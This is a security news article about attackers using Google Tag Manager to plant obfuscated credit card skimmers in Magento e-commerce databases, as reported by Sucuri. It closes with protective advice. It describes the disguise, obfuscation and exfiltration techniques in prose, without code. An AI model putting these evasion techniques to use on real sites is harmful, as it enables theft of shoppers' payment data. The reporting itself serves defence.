Cybersecurity experts have discovered that hackers are using Google Tag Manager (GTM) to secretly inject malicious scripts into e-commerce websites. These scripts, known as credit card skimmers, steal customers’ payment details when they enter them during checkout.
Attack Details
Researchers at Sucuri have observed threat actors leveraging GTM to install e-skimmer malware on Magento-based e-stores. Google Tag Manager (GTM) is a free tool that allows website owners to manage marketing tags without modifying site code, simplifying analytics and ad tracking. However, attackers exploit this feature to inject malicious scripts.
Sucuri inspected an affected website and found the malicious code hidden in the database (cms_block.content), disguised as a Google Tag Manager and Google Analytics script to evade detection. This technique enables hackers to bypass security measures and remain undetected.
Previous Incidents
This is not the first time GTM has been used for e-skimming. In 2024, Sucuri researchers detailed how Magecart veteran ATMZOW utilized Google Tag Manager to deliver malware. The latest report confirms that the tactic is still actively being used by cybercriminals.
At the time of publishing, three websites were found infected with the GTM identifier (GTM-MLHK2N68), down from six reported earlier by Sucuri.
How the Malware Works
Once embedded, the GTM tag contains an encoded JavaScript payload that acts as a credit card skimmer. The script captures sensitive payment data entered by users during checkout and transmits it to an attacker-controlled server. The malware also uses the _0x5cdc function to obfuscate code, mapping index values to characters and employing mathematical operations. Attackers further utilize Base64 encoding to disguise malicious scripts, making detection even harder.
Additionally, the script injects a modified Google Analytics script, which executes a hidden credit card skimmer to exfiltrate payment data to an external server.
Expert Insights
Security researchers warn that this GTM-based attack highlights the growing sophistication of modern malware. By leveraging legitimate platforms like Google Tag Manager, attackers can deploy harmful code while evading traditional security measures. The obfuscation and encoding techniques used in these attacks require deep investigation to uncover their true purpose.
How to Protect Against GTM-Based Attacks
- Monitor GTM Configurations: Regularly audit GTM settings and scripts for unauthorized changes.
- Use Security Tools: Implement advanced security solutions to detect unusual script behavior.
- Enable Content Security Policies (CSP): Restrict JavaScript execution to prevent unauthorized scripts.
- Perform Security Audits: Conduct frequent security checks to identify and mitigate vulnerabilities.
Conclusion
Cybercriminals continue to refine their methods, using trusted tools like Google Tag Manager to steal financial data. Online businesses must remain vigilant, update their security protocols, and educate customers on safe online shopping practices.